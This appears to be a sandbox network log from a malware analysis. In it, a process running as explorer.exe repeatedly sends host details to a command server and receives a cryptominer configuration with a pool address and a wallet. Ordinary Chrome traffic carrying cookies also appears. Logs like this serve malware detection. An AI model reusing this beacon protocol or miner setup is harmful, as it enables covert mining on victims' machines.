2024-12-12 21:41:07 UTC	684	IN	Data Raw: 00 00 01 00 02 00 10 10 00 00 01 00 20 00 68 04 00 00 26 00 00 00 20 20 00 00 01 00 20 00 a8 10 00 00 8e 04 00 00 28 00 00 00 10 00 00 00 20 00 00 00 01 00 20 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff 30 fd fd fd 96 fd fd fd d8 fd fd fd f9 fd fd fd f9 fd fd fd d7 fd fd fd 94 fe fe fe 2e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 fe fe fe 09 fd fd fd 99 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fd fd fd 95 ff ff ff 08 00 00 00 00 00 00 00 00 00 00 00 00 fe fe fe 09 fd fd fd c1 ff ff ff ff fa fd f9 ff b4 d9 a7 ff 76 ba 5d ff 58 ab 3a ff 58 aa 3a ff 72 b8 59 ff ac d5 9d ff f8 fb f6 ff ff Data Ascii: h& ( 0.v]X:X:rY
2024-12-12 21:41:07 UTC	1390	IN	Data Raw: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fd fd fd d8 fd fd fd 99 ff ff ff ff 92 cf fb ff 37 52 ec ff 38 46 ea ff d0 d4 fa ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fd fd ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fd fd fd 96 fe fe fe 32 ff ff ff ff f9 f9 fe ff 56 62 ed ff 35 43 ea ff 3b 49 eb ff 95 9c f4 ff cf d2 fa ff d1 d4 fa ff 96 9d f4 ff 52 5e ed ff e1 e3 fc ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 30 00 00 00 00 fd fd fd 9d ff ff ff ff e8 ea fd ff 58 63 ee ff 35 43 ea ff 35 43 ea ff 35 43 ea ff 35 43 ea ff 35 43 ea ff 35 43 ea ff 6c 76 f0 ff ff ff ff ff ff ff ff ff fd fd fd 98 00 00 00 00 00 00 00 00 ff ff ff 0a fd fd fd c3 ff ff ff ff f9 f9 fe ff a5 ac f6 ff 5d 69 ee ff 3c Data Ascii: 7R8F2Vb5C;IR^0Xc5C5C5C5C5C5Clv]i<
2024-12-12 21:41:07 UTC	1390	IN	Data Raw: ff ff ff ff ff ff ff ff ff ff ff ff fd fd fd d0 ff ff ff 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 fd fd fd 8b ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff b1 d8 a3 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 60 a5 35 ff ca 8e 3e ff f9 c1 9f ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fd fd fd 87 00 00 00 00 00 00 00 00 00 00 00 00 fe fe fe 25 fd fd fd fb ff ff ff ff ff ff ff ff ff ff ff ff c2 e0 b7 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 6e b6 54 ff 9f ce 8d ff b7 da aa ff b8 db ab ff a5 d2 95 ff 7b bc 64 ff 54 a8 35 ff 53 a8 34 ff 77 a0 37 ff e3 89 41 ff f4 85 42 ff f4 85 42 Data Ascii: S4S4S4S4S4S4S4S4S4S4S4S4S4S4`5>%S4S4S4S4S4S4nT{dT5S4w7ABB
2024-12-12 21:41:07 UTC	1390	IN	Data Raw: 42 ff f4 85 42 ff f4 85 42 ff f4 85 42 ff f4 85 42 ff f4 85 42 ff f4 85 42 ff fb d5 bf ff ff ff ff ff ff ff ff ff ff ff ff ff fd fd fd ea fd fd fd cb ff ff ff ff ff ff ff ff ff ff ff ff 46 cd fc ff 05 bc fb ff 05 bc fb ff 05 bc fb ff 21 ae f9 ff fb fb ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fd fd fd c8 fd fd fd 9c ff ff ff ff ff ff ff ff ff ff ff ff 86 df fd ff 05 bc fb ff 05 bc fb ff 15 93 f5 ff 34 49 eb ff b3 b8 f7 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff Data Ascii: BBBBBBBF!4I
2024-12-12 21:41:07 UTC	576	IN	Data Raw: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fd fd fd d2 fe fe fe 24 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff 0a fd fd fd 8d fd fd fd fc ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fd fd fd fb fd fd fd 8b fe fe fe 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 fe fe fe 27 fd fd fd 9f fd fd fd f7 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff Data Ascii: $'

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
54	192.168.2.5	49905	172.217.19.238	443	7520	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-12 21:41:11 UTC	1109	OUT	POST /log?hasfast=true&authuser=0&format=json HTTP/1.1 Host: play.google.com Connection: keep-alive Content-Length: 921 sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-platform: "Windows" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Content-Type: text/plain;charset=UTF-8 Accept: / Origin: https://ogs.google.com X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlqHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc= Sec-Fetch-Site: same-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty Referer: https://ogs.google.com/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: AEC=AZ6Zc-UTHLLZevbgFclxjoPEl47Uxk8JZ6pwfWAwN2RStmUJS_dVPL-88qw; OGPC=19037049-1:; NID=520=Qt7ODDQ4dbndN5i35TXj_w2KuYPxRMPjzFOP8xnwdEFHFDJKmYa-d3mM0jwzo5eipZDwyK0dcGzsUOJ3iBP6gNtXZ4lOxhNMdd6tlHlPR9YG2EVaEppsg6dlmXHvls6PntakgbcnkRALxkNszxpHTv6ahgeZRxa9-ir50-8lqu7cniN8DtNlPBRBaKdaoeW3j0WISR4VOPdqp8bO_8FyM8uoS4w
2024-12-12 21:41:11 UTC	921	OUT	Data Raw: 5b 5b 31 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 5b 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 22 65 6e 22 2c 6e 75 6c 6c 2c 22 62 6f 71 5f 6f 6e 65 67 6f 6f 67 6c 65 68 74 74 70 73 65 72 76 65 72 5f 32 30 32 34 31 32 30 39 2e 30 38 5f 70 30 22 2c 6e 75 6c 6c 2c 5b 5b 5b 22 47 6f 6f 67 6c 65 20 43 68 72 6f 6d 65 22 2c 22 31 31 37 22 5d 2c 5b 22 4e 6f 74 3b 41 3d 42 72 61 6e 64 22 2c 22 38 22 5d 2c 5b 22 43 68 72 6f 6d 69 75 6d 22 2c 22 31 31 37 22 5d 5d 2c 30 2c 22 57 69 6e 64 6f 77 73 22 2c 22 31 30 2e 30 2e 30 22 2c 22 78 38 36 22 2c 22 22 2c 22 31 31 37 2e 30 2e 35 39 33 38 2e 31 33 32 22 5d 2c 5b 33 2c 30 2c 30 2c 30 2c 30 5d 5d 5d 2c 31 Data Ascii: [[1,null,null,null,null,null,null,null,null,null,[null,null,null,null,"en",null,"boq_onegooglehttpserver_20241209.08_p0",null,[[["Google Chrome","117"],["Not;A=Brand","8"],["Chromium","117"]],0,"Windows","10.0.0","x86","","117.0.5938.132"],[3,0,0,0,0]]],1
2024-12-12 21:41:12 UTC	494	IN	HTTP/1.1 200 OK Access-Control-Allow-Origin: https://ogs.google.com Cross-Origin-Resource-Policy: cross-origin Access-Control-Allow-Credentials: true Access-Control-Allow-Headers: X-Playlog-Web Content-Type: text/plain; charset=UTF-8 Date: Thu, 12 Dec 2024 21:41:12 GMT Server: Playlog X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Accept-Ranges: none Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked
2024-12-12 21:41:12 UTC	137	IN	Data Raw: 38 33 0d 0a 5b 22 2d 31 22 2c 6e 75 6c 6c 2c 5b 5b 5b 22 41 4e 44 52 4f 49 44 5f 42 41 43 4b 55 50 22 2c 30 5d 2c 5b 22 42 41 54 54 45 52 59 5f 53 54 41 54 53 22 2c 30 5d 2c 5b 22 53 4d 41 52 54 5f 53 45 54 55 50 22 2c 30 5d 2c 5b 22 54 52 4f 4e 22 2c 30 5d 5d 2c 2d 33 33 33 34 37 33 37 35 39 34 30 32 34 39 37 31 32 32 35 5d 2c 5b 5d 2c 7b 22 31 37 35 32 33 37 33 37 35 22 3a 5b 31 30 30 30 30 5d 7d 5d 0d 0a Data Ascii: 83["-1",null,[[["ANDROID_BACKUP",0],["BATTERY_STATS",0],["SMART_SETUP",0],["TRON",0]],-3334737594024971225],[],{"175237375":[10000]}]
2024-12-12 21:41:12 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
55	192.168.2.5	49914	154.216.20.243	443	7236	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-12 21:41:15 UTC	179	OUT	POST /66/api/endpoint.php HTTP/1.1 Accept: / Connection: close Content-Length: 552 Content-Type: application/json Host: woo097878781.win User-Agent: cpp-httplib/0.12.6
2024-12-12 21:41:15 UTC	552	OUT	Data Raw: 7b 22 69 64 22 3a 22 79 66 71 68 65 73 77 6c 61 7a 6c 7a 6f 78 6d 78 22 2c 22 63 6f 6d 70 75 74 65 72 6e 61 6d 65 22 3a 22 32 35 38 35 35 35 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 61 6c 66 6f 6e 73 22 2c 22 67 70 75 22 3a 22 4f 54 4e 43 32 5f 37 4c 4d 22 2c 22 63 70 75 22 3a 22 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 2c 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 22 2c 22 72 65 6d 6f 74 65 63 6f 6e 66 69 67 22 3a 22 68 74 74 70 73 3a 2f 2f 77 6f 6f 30 39 37 38 37 38 37 38 31 2e 77 69 6e 2f 50 2e 74 78 74 22 2c 22 76 65 72 73 69 6f 6e 22 3a 22 33 2e 34 2e 31 22 2c 22 61 63 74 69 76 65 77 69 6e 64 6f 77 22 3a Data Ascii: {"id":"yfqheswlazlzoxmx","computername":"258555","username":"user","gpu":"OTNC2_7LM","cpu":"Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz, Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz","remoteconfig":"https://woo097878781.win/P.txt","version":"3.4.1","activewindow":
2024-12-12 21:41:15 UTC	264	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 12 Dec 2024 21:41:15 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Powered-By: PHP/8.3.14 X-Robots-Tag: noindex, nofollow Vary: Accept-Encoding X-Powered-By: PleskLin
2024-12-12 21:41:15 UTC	492	IN	Data Raw: 31 65 30 0d 0a 7b 0d 0a 20 20 20 20 22 61 6c 67 6f 22 3a 20 22 72 78 2f 30 22 2c 0d 0a 20 20 20 20 22 70 6f 6f 6c 22 3a 20 22 31 38 35 2e 31 35 37 2e 31 36 32 2e 32 31 36 22 2c 0d 0a 20 20 20 20 22 70 6f 72 74 22 3a 20 34 34 34 34 2c 0d 0a 20 20 20 20 22 77 61 6c 6c 65 74 22 3a 20 22 34 36 59 73 4a 65 4e 67 37 38 41 46 65 41 73 56 41 53 38 41 47 54 44 35 6e 66 4e 68 53 66 72 71 4e 41 4c 69 77 70 6e 4a 68 42 6b 58 63 67 52 67 67 70 79 6b 61 4b 5a 59 6a 70 33 59 53 77 59 52 44 32 41 31 63 45 48 71 71 6b 75 71 44 4b 48 58 57 6a 34 58 53 56 6a 78 47 38 61 73 65 6a 42 22 2c 0d 0a 20 20 20 20 22 70 61 73 73 77 6f 72 64 22 3a 20 22 22 2c 0d 0a 20 20 20 20 22 6e 69 63 65 68 61 73 68 22 3a 20 74 72 75 65 2c 0d 0a 20 20 20 20 22 73 73 6c 74 6c 73 22 3a 20 74 72 75 Data Ascii: 1e0{ "algo": "rx/0", "pool": "185.157.162.216", "port": 4444, "wallet": "46YsJeNg78AFeAsVAS8AGTD5nfNhSfrqNALiwpnJhBkXcgRggpykaKZYjp3YSwYRD2A1cEHqqkuqDKHXWj4XSVjxG8asejB", "password": "", "nicehash": true, "ssltls": tru

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
56	192.168.2.5	50034	154.216.20.243	443	7236	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-12 21:42:15 UTC	179	OUT	POST /66/api/endpoint.php HTTP/1.1 Accept: / Connection: close Content-Length: 552 Content-Type: application/json Host: woo097878781.win User-Agent: cpp-httplib/0.12.6
2024-12-12 21:42:15 UTC	552	OUT	Data Raw: 7b 22 69 64 22 3a 22 79 66 71 68 65 73 77 6c 61 7a 6c 7a 6f 78 6d 78 22 2c 22 63 6f 6d 70 75 74 65 72 6e 61 6d 65 22 3a 22 32 35 38 35 35 35 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 61 6c 66 6f 6e 73 22 2c 22 67 70 75 22 3a 22 4f 54 4e 43 32 5f 37 4c 4d 22 2c 22 63 70 75 22 3a 22 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 2c 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 22 2c 22 72 65 6d 6f 74 65 63 6f 6e 66 69 67 22 3a 22 68 74 74 70 73 3a 2f 2f 77 6f 6f 30 39 37 38 37 38 37 38 31 2e 77 69 6e 2f 50 2e 74 78 74 22 2c 22 76 65 72 73 69 6f 6e 22 3a 22 33 2e 34 2e 31 22 2c 22 61 63 74 69 76 65 77 69 6e 64 6f 77 22 3a Data Ascii: {"id":"yfqheswlazlzoxmx","computername":"258555","username":"user","gpu":"OTNC2_7LM","cpu":"Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz, Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz","remoteconfig":"https://woo097878781.win/P.txt","version":"3.4.1","activewindow":
2024-12-12 21:42:16 UTC	264	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 12 Dec 2024 21:42:16 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Powered-By: PHP/8.3.14 X-Robots-Tag: noindex, nofollow Vary: Accept-Encoding X-Powered-By: PleskLin
2024-12-12 21:42:16 UTC	492	IN	Data Raw: 31 65 30 0d 0a 7b 0d 0a 20 20 20 20 22 61 6c 67 6f 22 3a 20 22 72 78 2f 30 22 2c 0d 0a 20 20 20 20 22 70 6f 6f 6c 22 3a 20 22 31 38 35 2e 31 35 37 2e 31 36 32 2e 32 31 36 22 2c 0d 0a 20 20 20 20 22 70 6f 72 74 22 3a 20 34 34 34 34 2c 0d 0a 20 20 20 20 22 77 61 6c 6c 65 74 22 3a 20 22 34 36 59 73 4a 65 4e 67 37 38 41 46 65 41 73 56 41 53 38 41 47 54 44 35 6e 66 4e 68 53 66 72 71 4e 41 4c 69 77 70 6e 4a 68 42 6b 58 63 67 52 67 67 70 79 6b 61 4b 5a 59 6a 70 33 59 53 77 59 52 44 32 41 31 63 45 48 71 71 6b 75 71 44 4b 48 58 57 6a 34 58 53 56 6a 78 47 38 61 73 65 6a 42 22 2c 0d 0a 20 20 20 20 22 70 61 73 73 77 6f 72 64 22 3a 20 22 22 2c 0d 0a 20 20 20 20 22 6e 69 63 65 68 61 73 68 22 3a 20 74 72 75 65 2c 0d 0a 20 20 20 20 22 73 73 6c 74 6c 73 22 3a 20 74 72 75 Data Ascii: 1e0{ "algo": "rx/0", "pool": "185.157.162.216", "port": 4444, "wallet": "46YsJeNg78AFeAsVAS8AGTD5nfNhSfrqNALiwpnJhBkXcgRggpykaKZYjp3YSwYRD2A1cEHqqkuqDKHXWj4XSVjxG8asejB", "password": "", "nicehash": true, "ssltls": tru

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
57	192.168.2.5	50115	154.216.20.243	443	7236	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-12 21:43:15 UTC	179	OUT	POST /66/api/endpoint.php HTTP/1.1 Accept: / Connection: close Content-Length: 552 Content-Type: application/json Host: woo097878781.win User-Agent: cpp-httplib/0.12.6
2024-12-12 21:43:15 UTC	552	OUT	Data Raw: 7b 22 69 64 22 3a 22 79 66 71 68 65 73 77 6c 61 7a 6c 7a 6f 78 6d 78 22 2c 22 63 6f 6d 70 75 74 65 72 6e 61 6d 65 22 3a 22 32 35 38 35 35 35 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 61 6c 66 6f 6e 73 22 2c 22 67 70 75 22 3a 22 4f 54 4e 43 32 5f 37 4c 4d 22 2c 22 63 70 75 22 3a 22 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 2c 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 22 2c 22 72 65 6d 6f 74 65 63 6f 6e 66 69 67 22 3a 22 68 74 74 70 73 3a 2f 2f 77 6f 6f 30 39 37 38 37 38 37 38 31 2e 77 69 6e 2f 50 2e 74 78 74 22 2c 22 76 65 72 73 69 6f 6e 22 3a 22 33 2e 34 2e 31 22 2c 22 61 63 74 69 76 65 77 69 6e 64 6f 77 22 3a Data Ascii: {"id":"yfqheswlazlzoxmx","computername":"258555","username":"user","gpu":"OTNC2_7LM","cpu":"Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz, Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz","remoteconfig":"https://woo097878781.win/P.txt","version":"3.4.1","activewindow":
2024-12-12 21:43:16 UTC	264	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 12 Dec 2024 21:43:16 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Powered-By: PHP/8.3.14 X-Robots-Tag: noindex, nofollow Vary: Accept-Encoding X-Powered-By: PleskLin
2024-12-12 21:43:16 UTC	492	IN	Data Raw: 31 65 30 0d 0a 7b 0d 0a 20 20 20 20 22 61 6c 67 6f 22 3a 20 22 72 78 2f 30 22 2c 0d 0a 20 20 20 20 22 70 6f 6f 6c 22 3a 20 22 31 38 35 2e 31 35 37 2e 31 36 32 2e 32 31 36 22 2c 0d 0a 20 20 20 20 22 70 6f 72 74 22 3a 20 34 34 34 34 2c 0d 0a 20 20 20 20 22 77 61 6c 6c 65 74 22 3a 20 22 34 36 59 73 4a 65 4e 67 37 38 41 46 65 41 73 56 41 53 38 41 47 54 44 35 6e 66 4e 68 53 66 72 71 4e 41 4c 69 77 70 6e 4a 68 42 6b 58 63 67 52 67 67 70 79 6b 61 4b 5a 59 6a 70 33 59 53 77 59 52 44 32 41 31 63 45 48 71 71 6b 75 71 44 4b 48 58 57 6a 34 58 53 56 6a 78 47 38 61 73 65 6a 42 22 2c 0d 0a 20 20 20 20 22 70 61 73 73 77 6f 72 64 22 3a 20 22 22 2c 0d 0a 20 20 20 20 22 6e 69 63 65 68 61 73 68 22 3a 20 74 72 75 65 2c 0d 0a 20 20 20 20 22 73 73 6c 74 6c 73 22 3a 20 74 72 75 Data Ascii: 1e0{ "algo": "rx/0", "pool": "185.157.162.216", "port": 4444, "wallet": "46YsJeNg78AFeAsVAS8AGTD5nfNhSfrqNALiwpnJhBkXcgRggpykaKZYjp3YSwYRD2A1cEHqqkuqDKHXWj4XSVjxG8asejB", "password": "", "nicehash": true, "ssltls": tru

Session ID	Source IP	Source Port	Destination IP	Destination Port
58	192.168.2.5	50120	154.216.20.243	443

Timestamp	Bytes transferred	Direction	Data
2024-12-12 21:44:16 UTC	179	OUT	POST /66/api/endpoint.php HTTP/1.1 Accept: / Connection: close Content-Length: 551 Content-Type: application/json Host: woo097878781.win User-Agent: cpp-httplib/0.12.6
2024-12-12 21:44:16 UTC	551	OUT	Data Raw: 7b 22 69 64 22 3a 22 79 66 71 68 65 73 77 6c 61 7a 6c 7a 6f 78 6d 78 22 2c 22 63 6f 6d 70 75 74 65 72 6e 61 6d 65 22 3a 22 32 35 38 35 35 35 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 61 6c 66 6f 6e 73 22 2c 22 67 70 75 22 3a 22 4f 54 4e 43 32 5f 37 4c 4d 22 2c 22 63 70 75 22 3a 22 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 2c 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 22 2c 22 72 65 6d 6f 74 65 63 6f 6e 66 69 67 22 3a 22 68 74 74 70 73 3a 2f 2f 77 6f 6f 30 39 37 38 37 38 37 38 31 2e 77 69 6e 2f 50 2e 74 78 74 22 2c 22 76 65 72 73 69 6f 6e 22 3a 22 33 2e 34 2e 31 22 2c 22 61 63 74 69 76 65 77 69 6e 64 6f 77 22 3a Data Ascii: {"id":"yfqheswlazlzoxmx","computername":"258555","username":"user","gpu":"OTNC2_7LM","cpu":"Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz, Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz","remoteconfig":"https://woo097878781.win/P.txt","version":"3.4.1","activewindow":
2024-12-12 21:44:17 UTC	264	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 12 Dec 2024 21:44:17 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Powered-By: PHP/8.3.14 X-Robots-Tag: noindex, nofollow Vary: Accept-Encoding X-Powered-By: PleskLin
2024-12-12 21:44:17 UTC	492	IN	Data Raw: 31 65 30 0d 0a 7b 0d 0a 20 20 20 20 22 61 6c 67 6f 22 3a 20 22 72 78 2f 30 22 2c 0d 0a 20 20 20 20 22 70 6f 6f 6c 22 3a 20 22 31 38 35 2e 31 35 37 2e 31 36 32 2e 32 31 36 22 2c 0d 0a 20 20 20 20 22 70 6f 72 74 22 3a 20 34 34 34 34 2c 0d 0a 20 20 20 20 22 77 61 6c 6c 65 74 22 3a 20 22 34 36 59 73 4a 65 4e 67 37 38 41 46 65 41 73 56 41 53 38 41 47 54 44 35 6e 66 4e 68 53 66 72 71 4e 41 4c 69 77 70 6e 4a 68 42 6b 58 63 67 52 67 67 70 79 6b 61 4b 5a 59 6a 70 33 59 53 77 59 52 44 32 41 31 63 45 48 71 71 6b 75 71 44 4b 48 58 57 6a 34 58 53 56 6a 78 47 38 61 73 65 6a 42 22 2c 0d 0a 20 20 20 20 22 70 61 73 73 77 6f 72 64 22 3a 20 22 22 2c 0d 0a 20 20 20 20 22 6e 69 63 65 68 61 73 68 22 3a 20 74 72 75 65 2c 0d 0a 20 20 20 20 22 73 73 6c 74 6c 73 22 3a 20 74 72 75 Data Ascii: 1e0{ "algo": "rx/0", "pool": "185.157.162.216", "port": 4444, "wallet": "46YsJeNg78AFeAsVAS8AGTD5nfNhSfrqNALiwpnJhBkXcgRggpykaKZYjp3YSwYRD2A1cEHqqkuqDKHXWj4XSVjxG8asejB", "password": "", "nicehash": true, "ssltls": tru

Session ID	Source IP	Source Port	Destination IP	Destination Port
59	192.168.2.5	50131	172.217.19.238	443

Timestamp	Bytes transferred	Direction	Data
2024-12-12 21:44:27 UTC	784	OUT	GET /log?format=json&hasfast=true HTTP/1.1 Host: play.google.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlqHLAQiFoM0BCOnFzQEIucrNAQiK080BGI/OzQEYwtjNARjrjaUX Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: AEC=AZ6Zc-UTHLLZevbgFclxjoPEl47Uxk8JZ6pwfWAwN2RStmUJS_dVPL-88qw; OGPC=19037049-1:; NID=520=Qt7ODDQ4dbndN5i35TXj_w2KuYPxRMPjzFOP8xnwdEFHFDJKmYa-d3mM0jwzo5eipZDwyK0dcGzsUOJ3iBP6gNtXZ4lOxhNMdd6tlHlPR9YG2EVaEppsg6dlmXHvls6PntakgbcnkRALxkNszxpHTv6ahgeZRxa9-ir50-8lqu7cniN8DtNlPBRBaKdaoeW3j0WISR4VOPdqp8bO_8FyM8uoS4w
2024-12-12 21:44:28 UTC	270	IN	HTTP/1.1 400 Bad Request Date: Thu, 12 Dec 2024 21:44:27 GMT Content-Type: text/html; charset=UTF-8 Server: Playlog Content-Length: 1555 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-12-12 21:44:28 UTC	1120	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 30 20 28 42 61 64 20 52 65 71 75 65 73 74 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 400 (Bad Request)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-
